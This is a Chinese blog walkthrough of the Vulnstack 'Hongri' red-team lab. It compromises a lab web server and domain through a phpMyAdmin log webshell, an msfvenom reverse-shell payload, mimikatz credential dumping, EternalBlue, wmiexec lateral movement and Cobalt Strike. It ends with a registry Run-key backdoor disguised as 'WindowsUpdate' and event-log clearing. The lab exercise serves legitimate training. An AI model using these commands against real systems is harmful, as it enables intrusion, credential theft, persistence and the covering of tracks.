红日ATT&CK红队实战(一)

项目拓扑

主机名 IP地址
WEB服务器 10.0.8.131 192.168.52.143
VM2(域成员) 192.168.52.141
VM3(域控) 192.168.52.138

项目搭建

项目下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

打开win7,根据提示修改密码然后重启,再开启phpstudy

其他两个靶机测试一下密码,提示修改的话也修改一下子。

渗透过程

外网打点


探测存活主机

netdiscover -r 10.0.8.0/24

image.png

端口扫描

masscan -p 1-65535 10.0.8.131 --rate=1000

image.png

nmap -sC -T 4 -A -sV -p 80,3306 10.0.8.131 -o attack1

image.png

访问80页面,发现是一个phpstudy探针

网站绝对路径:C:/phpStudy/WWW

image.png

尝试默认账号密码检测MySQL连接:root:root

image.png

发现数据库连接正常。

image.png

getshell这里有两个思路:

1、phpmyadmin开启日志功能,写入木马getshell
2、通过phpmyadmin,发现yxcms站点,通过信息泄露登录网站后台,修改网站模板文件getshell

phpmyadmin日志文件getshell

由于是一个phpstudy探针,所以肯定存在phpmyadmin页面,找一下

http://10.0.8.131/phpmyadmin/

image.png

查看当前是否能写入文件

SHOW GLOBAL VARIABLES LIKE '%secure%';

secure_file_priv的值为BULL,不可写入

image.png

猜想日志功能应该是开启的吧,查看一下。嗯... 没开启啊!!!

SHOW GLOBAL VARIABLES LIKE '%general%';

image.png

尝试开启日志功能

set GLOBAL general_log='ON';

image.png

嗯,不错呦,成功开启。

image.png

接下来把日志文件的路径改为一个php文件,这样就可以获取到一个webshell了。

set GLOBAL general_log_file="c:/phpStudy/WWW/404.php";

image.png

好,万事具备,上马。

image.png

image.png

yxcms修改模板文件getshell

在数据库发现有一个yxcms的数据库,猜想此处应该还有一个网站,试着找一下

image.png

这里的话可以在别的场景下可以生成字典然后进行扫描。

http://10.0.8.131/yxcms/

image.png

啊哈哈,账号密码

image.png

写入木马:<?php @eval($_POST[cmd]);?>

image.png

OK,莫得问题

image.png

上线Metasploit拿下域控

内网信息收集

发现直接是administrator权限。

image.png

接下来进行内网信息收集

net config workstation 发现当前处于域环境。

image.png

先上线metasploit,方便一点。

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.8.133 lport=1377 -f exe > r.exe

设置监听上线

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.0.8.133
set lport 1377
exploit

image.png

进程迁移,先来迁移到同权限的进程中,因为此时要做域信息收集。

migrate 408

image.png

当前主机另外一个网卡IP:192.168.52.143

DC的IP:192.168.52.138

image.png

也可以通过查看当前域的时间,域时间一般以域控为止,直接使用ICMP协议即可获取域控IP。

image.png

主机名 IP地址
域主机ROOT-TVI862UBEH 192.168.52.141
域控OWA 192.168.52.138

image.png

抓取密码

抓取hash

image.png

抓取明文密码

抓取密码需要SYSTEM权限,首先迁移到一个拥有SYSTEM权限的进程

migrate 488

image.png

抓取到域管理员密码:hongrisec@2023

image.png

设置路由

run get_local_subnets查看路由信息

run autoroute -s 192.168.52.0/24添加路由

run autoroute -p查看路由信息列表

image.png

开启socks5代理

use auxiliary/server/socks_proxy

小技巧:听说设置代理端口的时候尽量小于2300,这样隧道稳定一些。

image.png

编辑/etc/proxychains4.conf文件,添加socks5 127.0.0.1 1080

这样就表示代理配置成功

image.png

端口扫描

proxychains4 nmap -sT -Pn 192.168.52.141

image.png

proxychains4 nmap -sT -Pn 192.168.52.138

image.png

横向移动

成功拿下域控权限

image.png

然后尝试顺手也拿下另一台域主机的权限,但是失败了

image.png

既然不行,那就尝试扫描一下是否存在永恒之蓝漏洞

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.52.141
exploit

image.png

扫描发现存在永恒之蓝漏洞,但是不能使用ms17_010_psexec,因为此模块只支持x64版本,而当前目标系统是x86,因此可以使用下面ms17_010_command模块执行命令开启3389端口,从而拿下权限。

image.png

use auxiliary/admin/smb/ms17_010_command
set RHOSTS 192.168.52.141
set COMMAND 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server/v fDenyTSConnections /t REG_DWORD /d 00000000/f'
exploit

这里还是没失败了,但是咱别着急,咱还有活。

image.png

proxychains4 python3 wmiexec.py god/administrator@192.168.52.141

image.png

执行命令开启3389端口

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

image.png

使用nmap扫描也是开启的

image.png

接下来就直接远程桌面连接了,成功拿下主机权限

image.png

上线cobalt strike拿下域控

先添加一个http监听器

image.png

生成攻击载荷

image.png

通过蚁剑上传并运行,成功上线。

image.png

新建一个smb监听器,然后迁移进程

image.png

进程迁移成功。

image.png

域信息收集

查看当前工作组信息

image.png

查看域内主机

image.png

获取到域控和域主机的IP地址

image.png

抓取hash

image.png

运行mimikatz抓取域内铭文密码

image.png

端口扫描

image.png

横向移动

image.png

image.png

image.png

成功拿下域控和域主机的SYSTEM权限。

image.png

权限维持

在注册表开机启动项中添加后门程序

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d "C:\artifact.exe" /f

image.png

image.png

image.png

image.png

痕迹清除

clearev

image.png

清除windows的日志文件,包括远程桌面连接。

del /f /s /q "%userprofile%\Recent*.*

image.png

删除Data文件夹

image.png

posted @ 2023-03-18 14:56  Cx330Lm  阅读(340)  评论(0编辑  收藏  举报